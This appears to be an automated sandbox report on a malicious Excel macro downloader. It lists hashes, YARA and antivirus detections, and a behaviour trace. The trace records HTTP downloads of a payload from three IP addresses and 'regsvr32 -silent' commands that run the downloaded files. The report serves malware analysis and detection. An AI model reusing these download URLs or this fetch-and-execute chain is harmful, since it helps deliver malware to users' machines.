popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

1796250310-10042021.xls

VBA_macro Generic Malware Downloader MSOffice File
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Oct. 5, 2021, 4:52 p.m. Oct. 5, 2021, 4:54 p.m.
Size 129.5KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 18:17:20 2015, Last Saved Time/Date: Mon Oct 4 08:34:12 2021, Security: 0
MD5 1f4a448f535f2a3657dfef39beb4a662
SHA256 0a8b0b423e864ae0c19cbe56b135d804b91516bb9b633d889c315c757bfd3930
CRC32 5DC7238C
ssdeep 3072:Sk3hOdsylKlgxopeiBNhZFGzE+cL2kdAxc6YehWfGdtUHKGDbpmsii/+u6ssC06+:Sk3hOdsylKlgxopeiBNhZF+E+W2kdAxX
Yara
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]
  • Generic_Malware_Zero - Generic Malware
  • Microsoft_Office_File_Zero - Microsoft Office File
  • Microsoft_Office_File_Downloader_Zero - Microsoft Office File Downloader

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
188.119.113.3 Active Moloch
190.14.37.165 Active Moloch
5.196.247.11 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

suspicious_features Connection to IP address suspicious_request GET http://190.14.37.165/44474.7033944444.dat
suspicious_features Connection to IP address suspicious_request GET http://5.196.247.11/44474.7033944444.dat
request GET http://190.14.37.165/44474.7033944444.dat
request GET http://5.196.247.11/44474.7033944444.dat
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6bf98000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6bb8e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07dc7000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07dc7000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x066b4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x066b4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x066b4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x066b4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6af42000
process_handle: 0xffffffff
1 0 0
cmdline regsvr32 -silent ..\Celod.wac2
cmdline regsvr32 -silent ..\Celod.wac
cmdline regsvr32 -silent ..\Celod.wac1
DrWeb Exploit.Siggen3.20971
Cyren X97M/Downldr.TS.gen!Eldorado
ESET-NOD32 VBA/TrojanDownloader.Agent.WSI
TrendMicro-HouseCall TROJ_FRS.VSNTJ421
Kaspersky UDS:Trojan-Downloader.MSOffice.SLoad.gen
McAfee X97M/Downloader.lm
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef60000
process_handle: 0xffffffff
1 0 0
host 188.119.113.3
host 190.14.37.165
host 5.196.247.11
Time & API Arguments Status Return Repeated

URLDownloadToFileW

 url: http://190.14.37.165/44474.7033944444.dat
stack_pivoted: 0
filepath_r: ..\Celod.wac
filepath: C:\Users\test22\Celod.wac
2148270088 0

URLDownloadToFileW

 url: http://5.196.247.11/44474.7033944444.dat
stack_pivoted: 0
filepath_r: ..\Celod.wac1
filepath: C:\Users\test22\Celod.wac1
2148270088 0

URLDownloadToFileW

 url: http://188.119.113.3/44474.7033944444.dat
stack_pivoted: 0
filepath_r: ..\Celod.wac2
filepath: C:\Users\test22\Celod.wac2
2148270085 0
parent_process excel.exe martian_process regsvr32 -silent ..\Celod.wac2
parent_process excel.exe martian_process regsvr32 -silent ..\Celod.wac
parent_process excel.exe martian_process regsvr32 -silent ..\Celod.wac1
dead_host 188.119.113.3:80